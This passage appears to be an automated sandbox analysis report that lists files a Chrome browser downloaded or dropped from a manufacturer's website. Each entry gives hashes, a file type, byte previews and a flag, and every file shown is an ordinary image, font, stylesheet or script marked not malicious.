                                                                            SHA-512:DEDAC7520125AD00EEC6A7973A09AF9F7D2A6E1DA9B6012D4E3E4A75E02158BA479D01EB340B0740D727305DF14F0CBB42E236F5D8BCED9506BB05D67163DD2E
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/10/ieda-logo.png
                                                                            Preview:RIFF....WEBPVP8L..../|....a m..7..71..m.8...=..!.A.........A..CQ..P....\..`.a0..!0.!0h......$..I..,9=G....4.N.].......5......z.{._...yZ...p..Y.ff.E....f.....Qaf.....t:.......OLZ.f<...[Uc.2.l... .Q0....t.z.......`N.........@ ..y.]..f6.m.=....9....Y....Ue..Ls....fj.FU............ZU.......=.$I........t.;..UQ.EY..!2....q....w.~.~_.f.5..=i...5@....\.>../l.. "Bvm.,B.3..k.....<<.+..Y..@...!.T..-..C.../g...7....p.X.....<..:Y.......I)!r........#.u......tH...mA=....&..}.w.../..~.".l............G.%..g.m....Re........XkAD..uJ...B=...f.}.y~..mwZ.~|.ym...)...NH.>.....6..Fgm...../.........PT.D...A.-..._.....m......w..........L..(...'.}....~%:..O...J%D>.F&f?..,..e....B..@.M...d....]LM?!.{.P<^O-.ULU4.1.....*!N...T..e.:./.k/J..'.c..Ax..m/.y...-....#.....S..w.....G.9.......S....Q.}..f!2c"H.....V.}.fW..9,TW!23.y.\.u...:b=."..{c.....".._...e.XG<.."o..wI.[.Q...v+.%.Y... .o.}f...!.a@...]jXD..U.b?.....?..y9..ck..>6}..A..}..b....)=.8............>..[.Q^.l.!r.29ElK
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 600 x 538, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):3664
                                                                            Entropy (8bit):7.768815075554006
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:A3C33A1FB07AAD99C2751CB6F963123C
                                                                            SHA1:288974AF37915CDB74E77E6AE91FE452C6220C39
                                                                            SHA-256:0C95E7AAEAD0D75F11FA9A61C36DA354A16D43B583316D3C3CF62E82F3E382CB
                                                                            SHA-512:26D6F97C4BF6502A1D5E781CF3CB0ACAEA5B63C94706F8A9A651B81AB81485D9E9CFB1EB3C3669E8930955F1BAA8728AB11BCEC37767C7DA38066F3CCEB60BA5
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR...X..........(....]PLTE.../%#/%#/%#/%#/%#/%#/%#/%#/%#/%#/%#/%#/%#..................~..u..k.ya.mW.aM.TC.H9.;/!/%#........tRNS.. 0@`........6.......IDATx....r.:.@._B`.q..i.....v...$6"6%.v......]d&...HBx$.a.4.D....@....3....J..)Z&J......K...O.".....&n...+....t.A.t.)..q.E$#Ry...?....\.xf.....n0.w....f...>q7....&...NL..}.1....+.a....Z.1...*k&.X..o...V.../.?p........h.s...h%c?.~..O........?e..Q.c`&...p.p..K......@X ,..@X ,..@X ,..@X ,..@X ,..@X ,..@X ,..@X ,..@X ,..@X ,..@X ,..@X ,.?:I.<...*....5........o..TKK.^SX.4a..B.L........Y~w..W....*.... ..uM..<.5..E.}H2....z[[._[...\..K..<..%......je.\.+.-.k].+.z3.t.Vb.TH....PW.V7/.^..T..no3#..<.l7.6,.O..f...'..TOU.W."...Rk".J....f.E^.0........I0;|.k..]^.4.(.7b.m.....Dd'...~C..by.$._2.&/....2$f..?Em^...B@.h...%.......RC^mW.+.R+..P...L..M^.*.U..w...-N.._...k..`........N.}..XK...[.b.q..ZH`..m....~Z..Rj::.Q.x..}...+.6....GX.K.8d..2.@.?..5....K.%..>..V..P&..X.PP.Aw.........#.....L^.....
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (30837)
                                                                            Category:downloaded
                                                                            Size (bytes):31000
                                                                            Entropy (8bit):4.746143404849733
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:269550530CC127B6AA5A35925A7DE6CE
                                                                            SHA1:512C7D79033E3028A9BE61B540CF1A6870C896F8
                                                                            SHA-256:799AEB25CC0373FDEE0E1B1DB7AD6C2F6A0E058DFADAA3379689F583213190BD
                                                                            SHA-512:49F4E24E55FA924FAA8AD7DEBE5FFB2E26D439E25696DF6B6F20E7F766B50EA58EC3DBD61B6305A1ACACD2C80E6E659ACCEE4140F885B9C9E71008E9001FBF4B
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
                                                                            Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1841), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1841
                                                                            Entropy (8bit):5.086499700667676
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:F04A3B68154717BE2A6940EA7533E967
                                                                            SHA1:F702BC08868C258BB3CE814A87118F0FDC39E8AA
                                                                            SHA-256:EB9BBECACD334382E7D2A51FD666F7BE9637CC563E9F9FAB813C92426EC52CC9
                                                                            SHA-512:D3C4CA5A024A365AFFB9E6F93889D7BF70726295235698692562FC71AE40CD26652309A835D20D3C913AFC79BE61EB6AD281A631486357A56E95FAFC5388AA90
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/woo-product-slider/src/Frontend/assets/js/scripts.min.js?ver=2.8.2
                                                                            Preview:jQuery(document).ready((function($){$(".wps-product-section").each((function(index){var custom_id=$(this).attr("id"),layout_type=$("#"+custom_id).data("layout"),sliderData=$("#"+custom_id).data("swiper");if("grid"!=layout_type&&""!=custom_id&&!$("#"+custom_id).hasClass("swiper-initialized")){var wspSwiper=new Swiper("#"+custom_id,{speed:sliderData.speed,slidesPerView:sliderData.slidesPerView.mobile,loop:sliderData.infinite,spaceBetween:sliderData.spaceBetween,autoplay:!!sliderData.autoplay&&{delay:sliderData.autoplaySpeed,disableOnInteraction:!1},allowTouchMove:sliderData.swipe,simulateTouch:sliderData.draggable,freeMode:sliderData.freeMode,mousewheel:sliderData.mousewheel,autoHeight:sliderData.adaptiveHeight,keyboard:{enabled:sliderData.carousel_accessibility},grabCursor:!0,fadeEffect:{crossFade:!0},updateOnWindowResize:!0,breakpoints:{576:{slidesPerView:sliderData.slidesPerView.tablet},992:{slidesPerView:sliderData.slidesPerView.desktop},1200:{slidesPerView:sliderData.slidesPerView.l
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):1964758
                                                                            Entropy (8bit):7.99625573328352
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:F5B2EEE10348270576F14CD387EDD0EE
                                                                            SHA1:EC545B74440C404483CCF9AD95FF6170105DC13E
                                                                            SHA-256:B14711E8424762F3F51EA1219407497BAFBEB669346D4436070341BD14EDC30A
                                                                            SHA-512:4D02A04E7EB334C8B1CFFFDF9C176A21C845EFB18CE4288F353BDF1E2AA8254571B7CA1E105CE2630E6B7FF2A2EC4B495561A300B7665ECF8B70DA16C9425109
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/11/skidsteer-slider.png
                                                                            Preview:RIFF....WEBPVP8L..../.....Hn#I.$D........... .......zL....M...!7x...b.*.U....c.5>|......~............K...^g....]......-|.P.ww...kw....?.5.............4o.....M.....INyP..`wF....h.?;S.1>..+\...8]..].V.WZ..h.v.3..j<.\ry{W`..]..o.maf:..p...U~w..).)...#.0.0......Z..c41.y.D..|R..<PHT~.....|.*.%.%.....\M^..<......."pG@..../.D..!..hN1.h.m.....m...........>_.j.,...S4.=......,}.../m6....|....mm...8B....OwOH!...u.G...m...t.....][......G^mU.G..C......1J..-..P.vT....R....t.>...........y....z..[..#".?.'..{.!..<.!.=,!..J:Z5J........t^.........u...?.......~.~.~].'.....}......0....%D..'.K..*-.j.........xk..W......25n.Z..>,yX........L(.K..%.h.@.?.....8/..u.....w....j.h.".x@/.:....]aT.S....t>./.6.....?\........t..AE..Jd....v(..PU..P#T/u.Q.....w...}:O..._._.....o}....u..pV...}.9DDE....*J.z..r.%..o.Jal.....-.z.J.R..Z*ZT..z...(..B.,-....hU....j...J..p:_O.r.....r.Vj.......2.....*.c-.G.?...Y.q._..n..e....|..8.....\.......V.7..r.. ........... B..W.P....
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):39110
                                                                            Entropy (8bit):7.960275681492645
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:D5AF3CD04827232C534A1A0F42DAF3CA
                                                                            SHA1:D2D5A39E1F1227A821E11921F5DB405BA86A9EA5
                                                                            SHA-256:FAF899728EB51E8002EA6FD66A08EFE5AC1489CAF1DB931CD068499E063A0977
                                                                            SHA-512:EE8BC5B0EFA96C717560BFE4BE3CE7FE5EA1BAAE29031A894DBB3869C7B2627109B03CC5DCE80DFF68C19AABD7C8D1FE31A3185C77B0593D61CCEFD56B5BE484
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2024/09/K3DJBTH-300x300.png
                                                                            Preview:RIFF....WEBPVP8L..../+.J.M@..6n3.)....?..{.5.......#. ...4.Db..DM..|T..cR....^.)...V.../ld.....*.d..G...!g(..H>q.1i...y.;.~G.9.%...Y....._J....3..&ir.j...K ..)....l.-....jr..$..[.lH$.....D&..x<..T}.9N<.....M.9<9'.T-..z2.9...MU-.u{..9u..n.[...-.s...sg........O]HN....wf.{.]......o.....?.....(..../k.>.U.j[.$..w..5...}..%).v.. ...$i7d...F.b0f0.z......\.\)..f.F..!D.'...7.{+.g!..p.....n..=h..e...(8..t.k...4...x.c.......T...GK6.1..c..-.gs....G.ah.a'.L....Im\.<...[u...T.$..!..i9..)x.].u..em.....?.y}..H.`r6...+4g$X.Y....|X/q....u^y!6..e...GM`..!....IW7.t?..=.......)ZF.....M.0G.^4..r(6...&~{i.._L..d"TB..Y$I.N....I...D.n$.g..fB.*c?.%!...\.....w.2{.....)y...h..{j...C. I..Z.<N.(..#.j.B[...E....yN....!@........s.'J....M5.t[}..@..9.z....y.B..A@.*2.t..+...@..+..iCa...T..B..F...c.X<\..F...t.&.0.......W....|..d......m..d..c.{C(.a..C...EI..j...r..,.7ac8.6....p.ZKE..B-..K.7a.2.s..5Mb.v...|#..]..J&....M.!...j...zh...7.z........l,....#{h.94.CN.PB..L.a.S.....(..K.......
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (41169)
                                                                            Category:dropped
                                                                            Size (bytes):41172
                                                                            Entropy (8bit):5.505998162296305
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:0AA5002702487976D570A640C408EBA5
                                                                            SHA1:48930F22A2396DF313CCDFCB91CAC20E38F2B06B
                                                                            SHA-256:4E8276AEA0A3C7FE3600E6718C7F484D49C347C8D5763D89BE95900D526A14DA
                                                                            SHA-512:37A9D609DB21EE1E696CB437C02F0F6410925EB10B6353C0CDF95DB265E342F0BC3D2AE1851D209E4517D978B7CCBE8AD56F98247FA865AE405FAFD4D2E62CDA
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 18700, version 1.0
                                                                            Category:downloaded
                                                                            Size (bytes):18700
                                                                            Entropy (8bit):7.98736874715607
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:09F4776CFE309CF4E2912666C50C4F3D
                                                                            SHA1:18DDC34305A0CD46935165FE016952A11FF15B35
                                                                            SHA-256:ED6051A0F73E874C8F9022913259D82E4CE1E20931143D198FB3897A6BBC4239
                                                                            SHA-512:8326FC450773E780C4C5CB0B6878E5EC62D4039E3B3E678D149313A18B2A1E0A35D8CBB59BA20CF4F66256BC9A395E3CD6639DFB41B663CC8CB155A9912F83D0
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://use.typekit.net/af/6d4bb2/00000000000000003b9acafc/27/l?subset_id=2&fvd=n7&v=3
                                                                            Preview:wOF2......I...........H..........................:?DYNA..?GDYN....b.`.......s........^..L..6.$.... ..{..S.B.V.u.l............ubpS5 ...o.........c...V.+..']..vf#.2fhj...x.B....E...~..L.0.<.@.+.......vL..$&.A._x.w..$.`..n....h..v.`M.u9......8.._..rZU.......N..z.f.>/.t..q..4A..5q.)..`..N......).%.. ac...V..T.......Q{T.?.6.. }.Rq.Q..(d.....Z...]u.?..Ga...?.f.y.. $!...d$./.T.W]...S...*NE5...i.#....r%..Y.*..%.n.@.....x..T...p..I.)....t.M....g....`%,(....#$..*.......X..b.../.B..C.R.B.B..Eu...=wn:.vi..)BU.o....5...n.8.!.q...j...J."".t.VZ....@G...ZcJ.......tk..8r..8..@3.*.Ex+..2N..].)..F.xq.'.Y.WF.G.....k...8.e.5p..s.lu.(x.......xsx......%|.o.?.....|..?.a[..98....6...L..>...W.F...."..tC..W.9>...~%.-e.....i......-Js.*Aa&p.Dc.BRi..h.!/..M.YhZ4.. .-$K....?.`Z.>...kV..j.....N9..-SCs.n$k-+.J-...4U^!k).Lw.*]....N..h..Jv..HZ.H..@.<.%.......7....}R.T7.......j|....s....b....3l/...5..i.ee.e.T`.n$...[..X..fj.....%b..<...4.Sb.D5G.r.V"...&.|w5...ws...(.mm*.Z.....L
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):416
                                                                            Entropy (8bit):7.377067091331193
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:7A00D2FD5E3E181DE346EA0F67759167
                                                                            SHA1:C52633D3074518CBAA68BDF94A5FD198D4286D34
                                                                            SHA-256:E240E09F252A7F9EFD0B1961392A4C827C05FC789176D693F4610F93BA27D9F0
                                                                            SHA-512:B841AB68EA9BC273AD30867E23273B8C03836F3D511D627F00D951F7B47B28210E44424C109CDDCEF579956732C6DEC6CFBED46B74CD770412EEF4307F87ED7D
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/10/instagram.png
                                                                            Preview:RIFF....WEBPVP8L..../....o..m#..S....K.m.a....=.F.m.._.lO..F.......).A...`..$.%..hK[..{/mIB.....D.....:Lh.#....ld...sd..P..k........a$.J.>n.X.9w......BD.'...{..CQ^...ok.aw...N....Gt.....C.........U7....#+........Dq...HD'.......JD.....4C...X...$V....H*...R...H0l....eK.O/.X...&.T..b......S... .r..H~......srAKO."KY*.!...K...z.......3.~d.............%..HlehE@7j.S..a..cuD?.p..U#..R.d.\.]w].t.o|../...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (9242)
                                                                            Category:downloaded
                                                                            Size (bytes):9636
                                                                            Entropy (8bit):5.4156198930676736
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:EF56117D1BB5CC41AA6BD127A49C7640
                                                                            SHA1:B9C2ED774177FC0FCEBA5CB58113024B23FE4FB7
                                                                            SHA-256:D151F8C0B2659CFB63704D68654AD8D9437AE9DA4410536F63DDEC21689A0620
                                                                            SHA-512:0EC9039DBB47470815AD8BF58FD206672717A146B3A99BCB12444687E8489698E06664E6C6CC38A5D2954FA919E5A6C3BC57E44F3BE2655F92B801BAC43EC763
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.9.4.1
                                                                            Preview:/*!. * jQuery blockUI plugin. * Version 2.70.0-2014.11.23. * Requires jQuery v1.7 or later. *. * Examples at: http://malsup.com/jquery/block/. * Copyright (c) 2007-2013 M. Alsup. * Dual licensed under the MIT and GPL licenses:. * http://www.opensource.org/licenses/mit-license.php. * http://www.gnu.org/licenses/gpl.html. *. * Thanks to Amir-Hossein Sobhi for some excellent contributions!. */.!function(){"use strict";function e(e){e.fn._fadeIn=e.fn.fadeIn;var t=e.noop||function(){},o=/MSIE/.test(navigator.userAgent),n=/MSIE 6.0/.test(navigator.userAgent)&&!/MSIE 8.0/.test(navigator.userAgent),i=(document.documentMode,"function"==typeof document.createElement("div").style.setExpression&&document.createElement("div").style.setExpression);e.blockUI=function(e){d(window,e)},e.unblockUI=function(e){a(window,e)},e.growlUI=function(t,o,n,i){var s=e('<div class="growlUI"></div>');t&&s.append("<h1>"+t+"</h1>"),o&&s.append("<h2>"+o+"</h2>"),n===undefined&&(n=3e3);var l=function(t){t=t||{},e.blockU
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (6521)
                                                                            Category:downloaded
                                                                            Size (bytes):309400
                                                                            Entropy (8bit):5.579568569914821
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:41F1A19FD92307F08C2DC74B39488FF0
                                                                            SHA1:485117EAD1922162AE6E37ECD9BC866E62F7816A
                                                                            SHA-256:A552CDDD5E7276D1A8B3B7C6DABFAC26D2CCAAFB014F886ECDB46BA96FE9BFED
                                                                            SHA-512:FC519BDBF93BB4F40B9035CAD5C738E663E58CBF2BC830A674DB54F825A830C38EC4C8A59788DDB02DA1637039D0AD77DE7927B31B81BD59079755C95B2E3D44
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.googletagmanager.com/gtm.js?id=GTM-WX4F526N
                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"11",. . "macros":[{"function":"__e"},{"function":"__v","vtp_name":"gtm.elementId","vtp_dataLayerVersion":1},{"function":"__jsm","vtp_javascript":["template","(function(){return document.querySelector(\".gform_validation_errors\")\u0026\u0026document.querySelector(\".gform_validation_errors\").checkVisibility()?\"true\":\"false\"})();"]},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_ena
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):551
                                                                            Entropy (8bit):7.207045762176419
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:0C68568CC8BD8914F0C2CF065B7E41E5
                                                                            SHA1:0DC60DF6D05569C136DFF9A649DB65593E52ECC2
                                                                            SHA-256:1ECCE65D1BD17AE655D5B7ACB4112EB6FA8CDD2DF5E9CDDD06D8A39E91972377
                                                                            SHA-512:D3BF45E8D04BEB3F26F02936268DFB6BEDD37FB1FF2E20BB66C96BFC689A2EB7546B54AD353EE4531306E5179EBFA20F9CD4E68FF1BBE3EC1A146EB40092E08C
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR...d...d.....G<ef...?PLTE...,,,,,,,,,,,,---...***------+++---,,,(((,,,,,,---------+++---]k?.....tRNS.?....0..pO. ..`_..Sb....IDATh.....0.D..n>DQ....[cO....P.).....p.9.s.}+.K...h..I....].Q.*.E26~.{%...{._.4.f ...{F...3.Gd..0.3B..+.0c..^..!..WD.GdU..%.. .......2.....N2....!.........#.^R....".<@.#....<.d..y..X..*<.....$.#X...G..z}.yO8.s...Hx."UU...m*...."g4.|.T%,.....%4.f..G..Ha.E......0/.......!.....G..H.h.e...#4"i3c7iTr`....5v....Dm.).m:.Uf..[.ZW..R..5.._.s.....7..aR.{?..bc..m.1...s.9..1?..3~.`.5.....IEND.B`.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (13897), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):13897
                                                                            Entropy (8bit):5.031554382910303
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:7826EEB04A5F0314397DB8798EC77538
                                                                            SHA1:929DB98B4D4982545819EAC6B4063E54ED74AD50
                                                                            SHA-256:E29CBF382AC3C029B21249A8B53ACB0985B4B326677C46B06DADDAFDEE5AD8A0
                                                                            SHA-512:5706D4137245BE7534B940AF3A5F9F9C00A6C9C4F10BCA5D584FC5AA20C86DD722E2A6DC685C9C6001277DBCCF930F236D2FEC8DEA3FAC0C688C225A59B1395B
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/plugins/jquery.fancybox.css?ver=3.3.1
                                                                            Preview:body.compensate-for-scrollbar{overflow:hidden}.fancybox-active{height:auto}.fancybox-is-hidden{left:-9999px;margin:0;position:absolute!important;top:-9999px;visibility:hidden}.fancybox-container{-webkit-backface-visibility:hidden;height:100%;left:0;outline:0;position:fixed;-webkit-tap-highlight-color:transparent;top:0;-ms-touch-action:manipulation;touch-action:manipulation;transform:translateZ(0);width:100%;z-index:99992}.fancybox-container *{box-sizing:border-box}.fancybox-bg,.fancybox-inner,.fancybox-outer,.fancybox-stage{bottom:0;left:0;position:absolute;right:0;top:0}.fancybox-outer{-webkit-overflow-scrolling:touch;overflow-y:auto}.fancybox-bg{background:#1e1e1e;opacity:0;transition-duration:inherit;transition-property:opacity;transition-timing-function:cubic-bezier(.47,0,.74,.71)}.fancybox-is-open .fancybox-bg{opacity:.95;transition-timing-function:cubic-bezier(.22,.61,.36,1)}.fancybox-caption,.fancybox-infobar,.fancybox-navigation .fancybox-button,.fancybox-toolbar{direction:ltr;
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):44
                                                                            Entropy (8bit):4.652391277629867
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:25D813DDF9C7968CFC0D9A70545B957F
                                                                            SHA1:80BC046BB34B5E6FDE2BCCA1ED517845BBF3874C
                                                                            SHA-256:A5C083A125AB78FA5F7D9F64CCA0DEBC5BEC6C669F6653459E73C66A9F24FF20
                                                                            SHA-512:79B368D0CC3BDAC0FD490ECD5FA802B72D29D77E6830464F00D3D3EF99151C00764C534B6747A5B569246FFCF5CC8271A1209F66E00410FB8161892D96714E7D
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAltqUSuu95ANxIFDbtXVmoSEAnqNLUS17cPjRIFDTguaxESEAlH3lXs9r0vtRIFDVNaR8U=?alt=proto
                                                                            Preview:CgkKBw27V1ZqGgAKCQoHDTguaxEaAAoJCgcNU1pHxRoA
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (3969)
                                                                            Category:downloaded
                                                                            Size (bytes):287655
                                                                            Entropy (8bit):5.561565032635843
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:69856FB6E3F628754DBAA733E2E59AB3
                                                                            SHA1:42084AD332EAABFE261B54877DE5E48A648A83E9
                                                                            SHA-256:E144ADEEF0DE69FC07644BE1E8FF95BEC7A22F20B8D2800CF05C281EA4532DB7
                                                                            SHA-512:5E95EAF4EC74E3C22DB6B25D7BC25200BEACA3DA406A975F7F825DD4B9242AE6DE2C2851912CE85968AB4219DC35759404FB421D2F53B54F47E506D74B3CFC39
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.googletagmanager.com/gtag/js?id=AW-832604732&l=dataLayer&cx=c&gtm=45He4be0v9176964486za200
                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":15,"vtp_instanceDestinationId":"AW-832604732","tag_id":9},{"function":"__ogt_1p_data_v2","priority":5,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regio
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2640), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2640
                                                                            Entropy (8bit):5.144337450210144
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:35035105E11643C698C8E18C5672D50F
                                                                            SHA1:3889AD3C96029E697BA214BD014241155B0F6D1C
                                                                            SHA-256:88F9978F72C08D3863D139953DA9942B75FD2D088223F28C1BF18A23A6D14AFD
                                                                            SHA-512:4D96E25D72DCB736BCA438383831EB2E3447A3A06DDB9DD0BA495CFFC29D904B2B074D8C2AC968E35268FEA9DB4159FB5C834653B589B1F73A05DBB5E0C16995
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:var wpslAddons=wpslAddons||{};function wpslWidget(){wpslAddons.widget.init()}wpslAddons.widget={init:function(){jQuery("#wpsl-widget-search").length&&"undefined"!=typeof wpslWidgetSettings&&(1==wpslWidgetSettings.autoComplete&&wpslAddons.widget.api.autoComplete(),1!=wpslWidgetSettings.autoLocate||jQuery(".wpsl-search").hasClass("wpsl-widget")||wpslAddons.widget.api.geoLocationRequest()),jQuery(".wpsl-icon-direction").on("click",function(){wpslAddons.widget.api.geoLocationRequest()}),jQuery("#wpsl-widget-submit").bind("click",function(e){return jQuery.trim(jQuery("#wpsl-widget-search").val()).length?void jQuery("#wpsl-widget-search").removeClass("wpsl-error"):(jQuery("#wpsl-widget-search").addClass("wpsl-error").focus(),!1)})},api:{autoComplete:function(){var e,t={};if(void 0===wpslWidgetSettings.geocodeComponents||jQuery.isEmptyObject(wpslWidgetSettings.geocodeComponents)||(t.componentRestrictions=wpslWidgetSettings.geocodeComponents),void 0!==wpslWidgetSettings.autoCompleteOptions&&!j
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (21203), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):21203
                                                                            Entropy (8bit):5.384350270831258
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:9C5D7A664C547E313B509D325FACD00D
